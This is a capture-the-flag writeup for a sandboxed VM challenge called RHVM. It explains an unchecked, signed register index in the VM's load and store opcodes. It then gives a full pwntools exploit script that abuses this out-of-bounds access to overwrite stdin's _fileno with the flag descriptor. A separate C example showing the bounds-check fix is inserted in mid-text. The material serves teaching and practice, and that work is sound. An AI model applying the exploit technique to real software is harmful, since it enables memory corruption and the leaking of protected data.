Modifying _fileno so that stdin reads data from the flag fd

All files are on: Github

Overview

At the very start it obtains the file descriptor of the flag file and maps it with dup2 onto 0x233, so we know that 0x233 is the flag's file descriptor.

Then it sets up sandbox rules: execve and write are not allowed, and only 0x40 instructions can be fed into the VM itself.

The vulnerability

When it processes instructions, there are operations that use the value in a register as an index to read and write data in the memory region it defines, but it never checks the register.

If the register holds a negative number, it can read and write data outside that memory region, giving an OOB.
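The bug class above, with the fix a VM author would apply, as an added C example (this is not the RHVM's code; the register width and memory size here are constructed for the example, since the writeup does not state them). The unchecked load reproduces the pattern described in the writeup, and the checked versions show the single unsigned comparison that rejects negative and oversized indices alike:

```c
#include <stdbool.h>
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical VM layout, constructed for this example: the real RHVM's
 * register width and memory size are not stated in the writeup. */
#define VM_NREGS 8
#define VM_MEMSZ 256

typedef struct {
    int64_t regs[VM_NREGS];  /* signed registers: to unchecked code a negative value is just another index */
    uint8_t mem[VM_MEMSZ];   /* the VM's own memory region */
} vm_t;

/* Vulnerable pattern (the bug class described above): the register value is
 * used as an index with no range check, so regs[r] == -1 reads mem[-1], i.e.
 * whatever sits just before the buffer. Shown for contrast only; it is never
 * called here with an out-of-range register. */
uint8_t vm_load_unchecked(const vm_t *vm, int r)
{
    return vm->mem[vm->regs[r]];
}

/* One comparison rejects both negative and too-large indices: casting the
 * signed index to an unsigned type maps every negative value above len. */
bool vm_index_ok(int64_t idx, size_t len)
{
    return (uint64_t)idx < (uint64_t)len;
}

/* Hardened load: validates the register number and the index before touching
 * memory, and reports failure instead of reading out of bounds. */
bool vm_load_checked(const vm_t *vm, int r, uint8_t *out)
{
    if (r < 0 || r >= VM_NREGS)
        return false;
    if (!vm_index_ok(vm->regs[r], VM_MEMSZ))
        return false;
    *out = vm->mem[(size_t)vm->regs[r]];
    return true;
}

/* The same check applied to stores. */
bool vm_store_checked(vm_t *vm, int r, uint8_t val)
{
    if (r < 0 || r >= VM_NREGS)
        return false;
    if (!vm_index_ok(vm->regs[r], VM_MEMSZ))
        return false;
    vm->mem[(size_t)vm->regs[r]] = val;
    return true;
}

/* Test helper: fresh VM with mem[5] = 0x42 and R0 = idx, then a checked read.
 * Returns the byte read, or -1 if the index was rejected. */
int vm_demo_load(int64_t idx)
{
    vm_t vm;
    memset(&vm, 0, sizeof vm);
    vm.mem[5] = 0x42;
    vm.regs[0] = idx;
    uint8_t out = 0;
    if (!vm_load_checked(&vm, 0, &out))
        return -1;
    return out;
}

int main(void)
{
    const int64_t probes[] = {5, -1, VM_MEMSZ - 1, VM_MEMSZ, INT64_MIN};
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int res = vm_demo_load(probes[i]);
        if (res < 0)
            printf("index %lld rejected\n", (long long)probes[i]);
        else
            printf("index %lld -> 0x%02x\n", (long long)probes[i], res);
    }
    return 0;
}
```

The unsigned cast is the idiomatic form of this check: a separate `idx < 0` test is easy to forget for one of several load/store opcodes, whereas `(uint64_t)idx < len` covers both ends of the range in one place and can be shared by every memory-touching instruction handler.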

Exploitation approach

  1. Read the address of _IO_2_1_stdin_
  2. Add 0x6c to it (i.e. point at the position 4 bytes before it)
  3. Overwrite the stack address with the address produced by the first two steps
  4. A push operation writes 0x233 into the _fileno field of _IO_2_1_stdin_
  5. The printf after the final scanf then prints the flag

exp

from pwn import *
context(arch='amd64', os='linux', log_level='debug')

sl = lambda x: io.sendline(x)
s = lambda x: io.send(x)
rn = lambda x: io.recv(x)
ru = lambda x: io.recvuntil(x, drop=True)
r = lambda: io.recv()
it = lambda: io.interactive()
success = lambda x, y: log.success(x + ' ' + hex(y))

binary = './RHVM.bin'
o = {"give": 0x40, "print": 0x60, "sub": 208, 'memb': 0x42}
ops = []

def add(a, b, c):
    # encode one VM instruction: opcode in the high byte, operands a and b below it
    ops.append((a << 16) + (b << 8) + c)

def moveBtoRA(a, b):
    # opcode 0x40: move b into R[a]
    add(0x40, a, b)

def printS():
    # opcode 0x60: print
    add(0x60, 0, 0)

def RAsubRB(a, b):
    # opcode 208: R[a] -= R[b]
    add(208, a, b)

def RARdengyuRBM(a, b):
    # opcode 0x42: R[a] = M[R[b]] (register from memory, indexed by an unchecked register)
    add(0x42, a, b)

def RAMdengyuRBR(a, b):
    # opcode 0x41: M[R[a]] = R[b] (memory from register, indexed by an unchecked register)
    add(0x41, a, b)

def RAmulRB(a, b):
    # opcode 0xc0: R[a] *= R[b]
    add(0xc0, a, b)

def RAzuoyiRB(a, b):
    # opcode 224: R[a] <<= R[b]
    add(224, a, b)

def RAaddRB(a, b):
    # opcode 160: R[a] += R[b]
    add(160, a, b)

def pushRA(a):
    # opcode 0x70: push R[a]
    add(0x70, 0, a)


moveBtoRA(0, 6)
moveBtoRA(1, 4)
RAaddRB(0, 1)
RAsubRB(2, 0)
moveBtoRA(3, 5)
RAmulRB(3, 1)
RAsubRB(4, 3)
RARdengyuRBM(5, 4)
moveBtoRA(5, 6)
RAzuoyiRB(5, 1)
moveBtoRA(7, 8)
RAaddRB(0, 5)
RAaddRB(0, 7)
RAaddRB(0, 1)
RAMdengyuRBR(2, 0)
moveBtoRA(3, 1)
RAaddRB(2, 3)
RAaddRB(4, 3)
RARdengyuRBM(6, 4)
RAMdengyuRBR(2, 0)
moveBtoRA(0, 2)
moveBtoRA(2, 3)
RAzuoyiRB(0, 1)
RAaddRB(0, 2)
RAzuoyiRB(0, 1)
RAaddRB(0, 2)
pushRA(0)
printS()


io = process(binary)

ru('EIP: ')
sl('0')
ru('ESP: ')
sl('0')
ru('Give me code length: ')
sl(str(len(ops)))
ru('Give me code: ')
for i in ops:
    sl(str(i))
it()

Summary

Mainly the exploitation method was fairly novel to me, so I am noting it down here.